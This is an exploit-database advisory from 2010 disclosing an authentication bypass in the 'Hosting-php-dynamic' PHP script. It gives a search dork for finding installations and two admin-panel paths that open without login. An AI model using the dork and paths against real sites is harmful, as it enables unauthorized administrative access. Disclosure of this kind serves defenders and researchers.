id: 11534
date: 03/30/2010
title: Hosting-php-dynamic (Auth Bypass) Vulnerability
author: indoushka
cves: 

===============================================
Hosting-php-dynamic (Auth Bypass) Vulnerability
===============================================

========================================================================================                 
| # Title    : Hosting-php-dynamic (Auth Bypass) Vulnerability     
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com                                                                             
| # Web Site :
| # Dork     : Copyright 2010 My Hosting. All rights reserved
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : (Auth Bypass)                                                                  
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1 - http://127.0.0.1/Hosting-php-dynamic/admin/nav.php (Admin Panel)
  
 2 - http://127.0.0.1/Hosting-php-dynamic/admin/setup/index.php (Admin information)



#  0day.today [2023-03-26]  #